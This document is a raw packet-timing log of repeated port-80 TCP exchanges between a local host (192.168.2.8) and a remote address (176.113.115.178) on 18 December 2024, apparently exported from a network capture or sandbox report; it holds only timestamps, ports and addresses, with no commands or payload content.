                                                  Dec 18, 2024 14:07:44.934055090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.934175968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.934226990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.934900045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.987715006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.992424011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.992544889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.992623091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.992821932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.992993116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.993040085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.993156910 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.993782997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.993829012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.993835926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.994561911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.995053053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.995105982 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.995204926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.995565891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.995614052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.995774031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.995819092 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.996180058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.996357918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.996407032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.996998072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.997082949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.997131109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.997438908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.997658014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.997708082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.998476028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.998486996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.998532057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:44.999078035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.999217987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.999953985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:44.999968052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.000046015 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.000832081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.000845909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.000889063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.001663923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.001684904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.001734018 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.002439022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.002516031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.003304958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.003324032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.003354073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.003376961 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.004298925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.004312038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.004367113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.005517006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.005532026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.005605936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.006323099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.006335974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.006391048 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.006855965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.006870031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.006912947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.007364988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.007774115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.008397102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.008409977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.008450031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.008462906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.009219885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.009233952 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.009282112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.009864092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.009924889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.009970903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.010706902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.010948896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.011544943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.011593103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.011596918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.012295961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.012345076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.012418985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.012465954 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.013154030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.013278008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.013329029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.013999939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.014300108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.014352083 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.014837027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.014849901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.014889002 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.015629053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.015686989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.015736103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.016413927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.016614914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.016671896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.017229080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.017338037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.017395020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.018044949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.018299103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.018347979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.018922091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.018937111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.018970966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.020044088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.020107985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.020153999 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.020689964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.020716906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.020760059 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.021357059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.021470070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.022244930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.022285938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.022308111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.023003101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.023173094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.023204088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.023217916 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.023899078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.024070978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.024142981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.024765015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.081527948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.116465092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.116636992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.116734028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.116878033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.117198944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.117211103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.117264032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.118077040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.118235111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.118289948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.118907928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.118921041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.118958950 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.119556904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.119606018 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.119699001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.120367050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.120417118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.120417118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.121265888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.121651888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.121705055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.122045994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.122210979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.122262001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.122874975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.122925997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.123014927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.123735905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.123749018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.123790979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.124476910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.124906063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.124955893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.125428915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.125741959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.125785112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.126096010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.126151085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.126219034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.127026081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.127090931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.184468031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.184484005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.184568882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.184927940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.185017109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.185081959 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.185630083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.185883045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.185935974 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.186043978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.187165022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.187220097 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.187243938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.187571049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.187582970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.187638998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.188381910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.188395023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.188442945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.189377069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.189538956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.189589024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.189647913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.189693928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.190282106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.190376043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.190421104 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.191203117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.191216946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.191263914 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.191965103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.192070007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.192120075 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.192765951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.192965984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.193011045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.193617105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.193814993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.194648027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.194669962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.194700003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.194716930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.195523024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.195609093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.195653915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.197060108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.197109938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.197160959 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.197688103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.197743893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.198055029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.198101044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.198172092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.198820114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.198833942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.198869944 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.198884010 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.199419975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.199529886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.199580908 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.200257063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.200335979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.200422049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.201049089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.201189041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.201241016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.201829910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.202085972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.202630997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.202647924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.202683926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.202697992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.203455925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.203617096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.203668118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.204401016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.204601049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.204648972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.205189943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.205229044 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.205276966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.205966949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.205980062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.206037045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.206928968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.207156897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.207788944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.207845926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.207889080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.208622932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.208673954 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.208703995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.208750010 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.209367990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.209516048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.209568024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.210258007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.210315943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.210366011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.211307049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.211405039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.211877108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.211927891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.211951017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.212568045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.212618113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.212657928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.213517904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.213550091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.213567972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.213587046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.214273930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.214324951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.214375019 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.215372086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.215384960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.215432882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.215962887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.216140032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.216686964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.216746092 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.308813095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.308837891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.308969975 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.309169054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.309240103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.309334993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.309987068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.310101032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.310936928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.310998917 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.311032057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.311676025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.311767101 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.311788082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.311836004 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.312463045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.312572956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.312623024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.313312054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.313381910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.313436031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.314090014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.314148903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.314970970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.315020084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.315068960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.315784931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.315834045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.315860987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.315900087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.316601038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.316832066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.316884995 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.317425966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.317569971 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.317620039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.318316936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.318331003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.318387985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.319042921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.362730026 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.377609968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.377625942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.377712011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.377748966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.377825975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:45.377873898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:45.378093958 CET8049707176.113.115.178192.168.2.8
